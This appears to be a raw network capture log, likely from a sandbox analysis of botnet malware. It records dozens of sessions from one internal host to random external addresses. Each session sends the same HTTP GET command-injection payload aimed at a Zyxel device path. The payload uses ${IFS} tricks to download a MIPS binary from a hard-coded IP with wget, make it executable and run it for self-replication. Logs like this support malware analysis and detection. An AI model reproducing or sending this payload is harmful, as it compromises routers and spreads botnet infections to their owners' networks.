                                                Jan 12, 2024 18:16:10.148155928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1243192.168.2.236085080.146.15.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148188114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1244192.168.2.233551840.152.99.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148221016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1245192.168.2.2335896110.138.14.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148251057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1246192.168.2.2333076105.190.2.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148296118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1247192.168.2.2342812106.51.43.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148335934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1248192.168.2.233541669.254.96.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148382902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1249192.168.2.2340562145.242.133.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148406982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1250192.168.2.234020634.224.110.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148478031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1251192.168.2.235307241.128.238.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148509026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1252192.168.2.2352806130.186.54.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148556948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1253192.168.2.233568883.30.30.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148586035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1254192.168.2.2358598204.68.95.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148619890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1255192.168.2.2335374137.250.65.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148663044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1256192.168.2.234521246.166.133.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148705006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1257192.168.2.2352020108.105.30.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148766994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1258192.168.2.235438863.239.100.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148813009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1259192.168.2.2356238101.173.223.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148838997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1260192.168.2.233637625.140.185.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148875952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1261192.168.2.2347208184.202.124.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148926020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1262192.168.2.2351886161.249.47.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148952961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1263192.168.2.2335222184.41.139.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148983955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1264192.168.2.233906448.79.67.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149034977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1265192.168.2.2338348135.230.207.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149079084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1266192.168.2.235177834.189.84.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149127007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1267192.168.2.235516689.149.80.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149154902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1268192.168.2.2338986103.240.102.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149209976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1269192.168.2.2341140174.238.40.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149236917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1270192.168.2.235064438.39.140.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149286985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1271192.168.2.233893017.35.198.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149312019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1272192.168.2.2333828190.5.204.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149374962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1273192.168.2.2334480185.182.216.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149413109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1274192.168.2.2346944172.202.146.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149454117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1275192.168.2.2334270111.107.95.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149490118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1276192.168.2.235068841.136.60.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149564028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1277192.168.2.2349098114.3.245.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149569035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1278192.168.2.2338390117.93.52.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149624109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1279192.168.2.234967631.116.160.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149683952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1280192.168.2.235850823.173.24.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149703979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1281192.168.2.23562821.143.17.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149755955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1282192.168.2.2345894171.100.150.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149797916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1283192.168.2.234034419.95.68.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149833918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1284192.168.2.2351282190.252.87.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149872065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1285192.168.2.2340842199.116.211.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149895906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1286192.168.2.2350836146.78.86.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149935007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1287192.168.2.2349566123.18.114.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.149970055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1288192.168.2.234132620.154.93.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150011063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1289192.168.2.2351210115.233.233.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150043964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1290192.168.2.235084489.95.28.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150090933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1291192.168.2.233409271.97.2.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150135994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1292192.168.2.234752881.194.180.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150171995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1293192.168.2.2348642165.155.58.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150222063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1294192.168.2.236023661.137.36.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150254965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1295192.168.2.233959248.117.159.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150305033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1296192.168.2.2354140201.2.175.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150358915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1297192.168.2.2334152150.153.186.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150398016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1298192.168.2.2351890165.104.5.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150404930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1299192.168.2.235455649.8.16.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150459051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1300192.168.2.23401181.158.212.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150490999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1301192.168.2.23409382.17.10.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150548935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1302192.168.2.2337648173.142.161.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150583982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1303192.168.2.2333362216.66.184.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150625944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1304192.168.2.235322083.138.168.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150671959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1305192.168.2.2360600150.194.219.45443
                                                TimestampBytes transferredDirectionData
